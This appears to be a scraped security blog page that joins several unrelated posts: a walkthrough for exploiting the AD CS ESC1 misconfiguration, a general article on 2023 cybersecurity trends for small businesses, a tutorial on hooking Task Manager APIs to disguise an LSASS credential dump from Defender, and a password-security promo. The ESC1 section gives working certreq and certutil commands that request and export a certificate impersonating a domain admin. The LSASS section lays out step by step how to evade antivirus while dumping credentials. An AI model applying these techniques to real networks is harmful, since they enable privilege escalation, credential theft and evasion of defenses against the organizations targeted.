While attacks on AD CS are great for escalation they also have an advantage for credential theft. This should not be news to anyone already familiar with AD CS vulnerabilities and exploitation but abusing default templates is pretty nifty. Speaking of escalation how might we exploit something like Escalation 1 from the command line? It’s actually pretty easy… 

Exploiting ESC1 

To exploit ESC1 from the command line first we need to create an INF file for the request. All you’ll need to do is set the UPN of the account you’re targeting in the SAN and the name of the vulnerable template. These 2 lines are bolded below. 

; esc1.inf 
[Version] 
Signature="$Windows NT$" 

[NewRequest] 
Subject = "CN=ESC1" ; Rename to whatever you want 
Exportable = TRUE ; Need true for export to pfx later 
KeyLength = 2048 
KeySpec = 1 
KeyUsage = 0xA0 
MachineKeySet = FALSE  
ProviderName = "Microsoft RSA SChannel Cryptographic Provider" 
RequestType = PKCS10 

[Extensions] 
2.5.29.17 = "{text}" ; OID for SAN extension  
_continue_ = "upn=<DAUserName>@<domain.tld>" ; UPN of DA account to place in SAN

[RequestAttributes] 
CertificateTemplate = "<TEMPLATENAME>" ; Name of template you're exploiting

Grab this file with curl, powershell, etc. and create the request based on the INF above: 

C:\> certreq -new esc1.inf request.pem 

Next, submit the request to the appropriate CA for your template: 

C:\> certreq -config "ca.domain.tld\\CA-NAME" -submit request.pem cert.pem 

If you don’t know the name of the CA then “certutil -dump” to avoid GUI 

Accept the certificate for adding to the user’s personal certificate store and note the Serial Number: 

C:\> certreq -accept cert.pem 

Finally, export the certificate using the Serial Number from previous command output: 

C:\> certutil -exportpfx -user -p "Password123" My <SerialNum> C:\\path\\to\\save\\esc1.pfx 

See OpSec considerations if stealth is of utmost importance. 

This entire process is also shown below: 

Now all you need to do is retrieve the certificate and elevate at a later date when you’re ready. 

Conclusion 

The default User template can be useful the second we obtain a shell as a means of semi-persistent credential theft. We can use native Windows utilities to obtain these certificates for import into tools at a later date. We can also use them to exploit some of the most common security misconfigurations pointed out by the SpecterOps team. It’s always worth knowing how to leverage native Windows commands and utilities at your disposal to aid in exploitation. You never know when you might find yourself in a situation where it’s the best approach for the time being. 

References 

SpecterOps - Certified Pre-Owned: 

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Microsoft Command Reference (certreq): 

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1

RiskInsight - Abusing PKI in Active Directory Environment:

https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/ 

In today’s business world, most companies are fully reliant on technology to maintain their daily operations. Data has become valuable currency and as much as technology creates convenience and efficiency, the sheer volume of connected devices and systems has increased risk and vulnerability. Attacks on systems are becoming more prolific and companies need to constantly evaluate if they have done enough to protect themselves or their customers.  

In a recent IT Trendsetters webinar with Rapid7, an MDR service provider, we discussed how cybersecurity is evolving and what the trends are for 2023. Specifically, common mistakes that make companies an easy target. You’ll want to avoid these pitfalls: 

Thinking that nobody cares about our company or data 

There is a perception that cybercriminals only target major multinational companies that have large customer databases of sensitive information that are worth exploiting. This may have been the case several years back, but no longer. These companies have invested heavily in security making it harder for criminals to break into their systems and so the attackers are turning to easier targets – small and medium sized business.  

Typically smaller companies don’t invest as heavily in security or monitor their systems as diligently, yet most are connected to the internet in some way. This makes them relatively easy targets. Even smaller businesses have to protect their reputation and their customer data and criminals know and exploit this. Unfortunately, without adequate protections in place, most small to medium-sized businesses don’t survive a targeted cyberattack. When considering security, it should be viewed as a necessity for business continuity rather than an additional expense. If company systems are exposed to the internet, they’re vulnerable and it takes a strategic effort and investment to make them more secure.  

Not utilizing Multi-Factor Authentication (MFA) 

A major trend emerging from 2022, was that almost 40% of high-severity breaches were a result of not implementing MFA on public-facing surfaces. Attackers got into systems with relative ease and were able to do a fair amount of damage in a short period of time. While many employees may feel that MFA is an annoyance, in terms of business, it’s become essential. It’s a really simple, no-cost way of making it harder for attackers to access and navigate through systems. The value cannot be understated. In fact, most insurance companies include MFA as a requirement for obtaining insurance coverage.  

Not securing connected devices 

Exchange servers, gateways, firewalls, and any endpoint that touches the internet could become an access point for an attacker if it is not properly secured. These are some of the areas that threat actors commonly go after to get into company systems and account for approximately 25% of attacks. Companies need to be diligent in keeping these access points patched and monitoring them for any unusual activity.  

Compromised identities 

Another major trend is attackers using stolen credentials to gain access to a company system. These are often obtained through Phishing emails or compromising an employee’s social media account. In addition, there are many brokers on the dark web making good business by selling compromised but authenticated identities. These are often identities of past employees and without having robust authentication and monitoring services in place, these compromised identities can go undetected. The risk of compromised identities is another reason to implement MFA, If an identity is compromised but MFA is in place, it makes it harder for attackers to use the identity to progress within company systems.  

Inadequate defense mechanisms 

As much as companies are proactive about security, the reality is that attack methods are constantly evolving and it’s not always possible to keep ahead of and block every vulnerability. This is why it’s critical when a threat is identified, to have partners, systems, and policies in place to be able to isolate and quickly shut down the attack to minimize the damage.  

The challenge is that this is a complex task requiring specific expertise that has the capacity to work with great urgency. Where the attack originated, how attackers gained access, what they did, and how it impacted business, all forms part of how the threat is resolved. Most small to medium-sized businesses can’t afford to employ this level of expertise full-time. Especially as the nature of threats are becoming increasingly complex. This is why it often makes sense to partner with Endpoint Detection and Response (EDR) and security specialists as part of a managed solution. In working with a number of clients, they have greater insight into how best to counter attacks and can often move more swiftly to mitigate the damage 

But even in that, there is a challenge. There are so many different security services available and it can be difficult to identify which ones are applicable to a specific business. There is no one-size-fits-all solution. When investigating options, it’s important to understand where the services start and end. For example, a managed detection and response service likely won’t be running system and patch updates, but they would be able to identify and work to resolve threats.  

Because of these complexities, another emerging trend is that many insurance companies are recommending companies outsource their security to partners who are specialists. Their collective exposure to threats makes them better positioned to be able to identify possible threats and remediate them. They can also then use this information to identify what gaps exist in terms of threats and what steps need to be taken to put the right security in place to reduce the risks.  

Cybersecurity constantly evolves, as these trends indicate, and requires an agile approach. Companies should continue to be proactive about security, partnering with industry specialists and keeping abreast of threats and vulnerabilities.  

 

 

There are many ways to create an LSASS dump file. One of the easiest ways is with Windows Task Manager. Simply right click the LSASS process and click “Create dump file”. This is great, except for the fact that Windows Defender will immediately flag this as malicious. Far from stealthy. Not ideal. 

This raised some interesting questions. What is it about Task Manager that triggers detection so quickly? One of the main differences is when dumping a process through Task Manager is that you cannot change the name of the output file. It will just be the name of the process. In our case, “lsass.DMP”. So could it be that Defender sees that file getting created and that triggers the alert? What if we could hook the API call(s) responsible for creating the file and change it to something else more benign. It is a trusted Windows tool after all and does not allow users to change the name of the resulting dump file. Can we abuse this trust to create a LSASS dump file with a different name that will leave Defender none the wiser? Short answer, yes! This blog will serve as an introduction to Windows API hooking. First, we will monitor the API call’s made while dumping LSASS from Task Manager. Then we will create a DLL that we can inject into the Task Manager process that will hook these API calls responsible for file creation and change the name of the LSASS dump file that gets created.  

Short Introduction to API Hooking: In order to change the name of the resulting dump file, we need to identify and “hook” these API calls that are responsible for creating the file so that we can modify the filename to our liking. To do this, we will use the Detours library. Installation and setup of this library is outside the scope of this blog and is left as an exercise for the reader.  

According to the Detours Wiki: “Detours replaces the first few instructions of the target function with an unconditional jump to the user-provided detour function. Instructions from the target function are placed in a trampoline. The address of the trampoline is placed in a target pointer. “ 

Essentially, once the target function is called, we will “jump” to our detour function. This is the function that we control. We can read the parameters to the function, modify them, or perform other actions before passing execution back to the original function. In our case, our detour function will modify the file path from the default: C:\Users\<username>\AppData\Local\Temp\lsass.DMP to something else. 

https://www.cs.columbia.edu/~junfeng/10fa-e6998/papers/detours.pdf

To identify the API calls we need to hook, we will use the tool API Monitor to, as the name suggests, monitor the API calls that are made when the dump file is created. We can then search through the output for a portion of our string “AppData\Local\Temp\lsass.DMP” and find the functions where it is being used. 

Because dumping LSASS requires administrative privileges, we will start Task Manager and API Monitor as Administrator. 

Before monitoring the process, we will select some API filters to tell API Monitor what to log. Since an exorbitant number of API calls are made, selecting everything is not ideal. We will select a few choices that seem reasonable for what we are trying to find. I have selected “Data Access and Storage, Diagnostics, NT Native, and System Services”. 

We select taskmgr.exe and begin monitoring. We create the LSASS dump file which unsurprisingly triggers Defender and kills the taskmgr process. In this short span of activity, we logged 193,416 API calls. Hopefully a few of them have what we need. 

Now we need to figure out where this file is getting created. Starting on the first thread, we search for our target string and see the first call which is to RtlInitUnicodeString 

Looking at the function signature on MSDN, we can see that the second parameter is the source string, which is the path to the lsass.DMP file, and the first parameter is a pointer to a UNICODE_STRING type that will be filled by this function call. 

Now looking ahead a little bit, we are trying to see where the file is getting created. Looking beyond the call to RtlInitUnicodeString, we see a call to NtCreateFile. We can inspect the parameters in API Monitor and we do see our target string deep in fields of the OBJECT_ATTRIBUTES struct. 

Looking up NtCreateFile on MSDN shows that the OBJECT_ATTRIBUTES struct contains a field, ObjectName of type PUNICODE_STRING. Which according to the documentation “Points to a buffered Unicode string that names the file to be created or opened.” 

Now we don’t need to hook the call to NCreateFile necessarily, we just need to find where this string is getting created and change it upstream from the call to this function. 

We already know about RtlInitUnicodeString, and just below that call, there is a call to RtlDosPathNameToRelativeNtPathName_U which also contains the lsass.DMP path string we are looking for. This is an undocumented function in ntdll.dll, but we can still find it’s function signature on a site such as ReactOS, and I also found that ChatGPT is quite handy for this as well. 

It mentions that NtName is a pointer to a UNICODE_STRING struct that will receive the translated NT path. This is evident as well in API Monitor and we can see this param has the same memory address as the PUNICODE_STRING passed to RtlInitUnicodeString. 

Repeating this process, we identify two other API calls that are like the previous two. 

RtlInitUnicodeStringEx 

RtlDosPathNameToRelativeNtPathName_U_WithStatus 

Finally, the last call is to SetDlgItemTextW which sets the text in the dialog box when the dump is complete. So to recap, we will need to hook the following API calls: 

RtlInitUnicodeString 

RtlDosPathNameToRelativeNtPathName_U 

RtlInitUnicodeStringEx 

RtlDosPathNameToRelativeNtPathName_U_WithStatus 

SetDlgItemTextW 

Creating our functions: 

We will open Visual Studio and create a new project and select Dynamic-Link Library (DLL). Now for each of the functions we need to hook, we have to do two things. The first is to create a pointer to the function we want to hook. The second is to create the detour function itself that will be invoked when our target function is called. 

We define the function pointers like so: 

Notice that the first four functions we are initializing to NULL, as opposed to the last function where we are setting it to the name of the real function we will be calling. This is because the first four functions are in NTDLL.dll and even though they are exported by the library, they cannot be called directly. So, we will have to dynamically look up these functions to get their addresses. We can do this quite easily with Detours and the DetourFindFunction method. 

We will also define two global variables of the path we are searching for, and what we want to replace it with. 

Now we need to create the functions we want to call when our target functions are hooked. These methods MUST have the exact same signature and calling convention of the real function. Using the same calling convention ensures that registers will be properly preserved and that the stack will be properly aligned between our detour and target functions. 

Since these API’s get called many times, we need to check the parameter containing the file path and see if it is the path with our lsass.DMP file. If it is, we will replace it with our new path to “normalfile.txt” and call our real target function pointer with the new variable. If it’s not, we will just call the real target function pointer with the parameters unchanged. 

Now, on the call to DLL_PROCESS_ATTACH we will create a method setHooks which will contain our Detours code. 

We are dynamically resolving the addresses to the functions located in NTDLL as mentioned earlier, and calling DetourAttach with a pointer to the address of our target function, and our detour function. 

Similarly, on DLL_PROCESS_DETACH we are calling a removeHooks method that restores all the original code. 

Now we can compile our project and inject the DLL!  

For testing simplicity, I am using Process Hacker to inject our DLL into Task Manager. I also have a project, DLLInject that would be more suitable in a real-world engagement. After injecting the DLL, we can see that it has been loaded into the process. 

Now, dumping the LSASS process, we can see that our file has been created without a peep from Defender! 

The full source code can be found at: 

https://github.com/djackreuter/taskmgr_hooking

Are you concerned about keeping your online account, personal information, and business accounts secure? Check out this infographic on password security. Our team of experts has shared a visual guide that provides valuable tips and tricks on how to create strong and unique passwords, and how to store and manage them securely. With cyber attacks becoming more sophisticated each day, it's crucial to take proactive measures to protect yourself and your sensitive information. Let our team of experts help secure your business today with a password assessment!

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram